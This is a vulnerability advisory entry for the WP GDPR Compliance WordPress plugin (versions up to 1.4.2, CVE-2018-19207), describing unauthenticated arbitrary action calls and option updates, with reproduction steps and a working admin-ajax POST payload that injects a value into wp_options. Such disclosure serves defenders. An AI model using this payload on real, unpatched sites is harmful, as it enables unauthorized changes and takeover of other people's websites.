Lucene search
Adrian MรถrchenWPEX-ID:678DAC05-D1F7-4E73-A310-DFFA8F5BB9C4HistoryNov 08, 2018 - 12:00 a.m.
WP GDPR Compliance <= 1.4.2 - Unauthenticated Call Any Action or Update Any Option
2018-11-0800:00:00
Adrian Mรถrchen
11
0.973 High
EPSS
Percentile
99.9%
The plugin WP GDPR Compliance allows unauthenticated users to execute any action and to update any database value. If the request data form is available for unauthenticated users, even unauthenticated users are able to do this. See references for discussion of the issue. The problem is in the file Includes/Ajax.php which doesnโt do any checking of the given values.
1. Install WordPress.
2. Install the plugin.
3. Enable the request form and publish the page.
Update an option:
1. Go to the page with request form
2. Check the pages source for "ajaxSecurity" and copy the value
3. Send an ajax request (as POST) to wp-admin/admin-ajax.php (must be within the same browser) with the following body:
action=wpgdprc_process_action&security=SECURITY_TOKEN_HERE&data={ "type":"save_setting","append":true,"enabled": true,"option":"injected","value" :"option"}
After that check your wp_options table for the new value.
Related
cve
cve
CVE-2018-19207
2018-11-12 17:29:00
cvelist
cvelist
CVE-2018-19207
2018-11-12 17:00:00
openvas
openvas
wpvulndb
wpvulndb
nvd
nvd
CVE-2018-19207
2018-11-12 17:29:00
nessus
nessus
WordPress Plugin 'WP GDPR Compliance' < 1.4.3 Privilege Escalation
2018-11-14 00:00:00
checkpoint_advisories
checkpoint_advisories
WordPress GDPR Compliance Plugin Privilege Escalation (CVE-2018-19207)
2018-10-24 00:00:00
prion
prion
Code injection
2018-11-12 17:29:00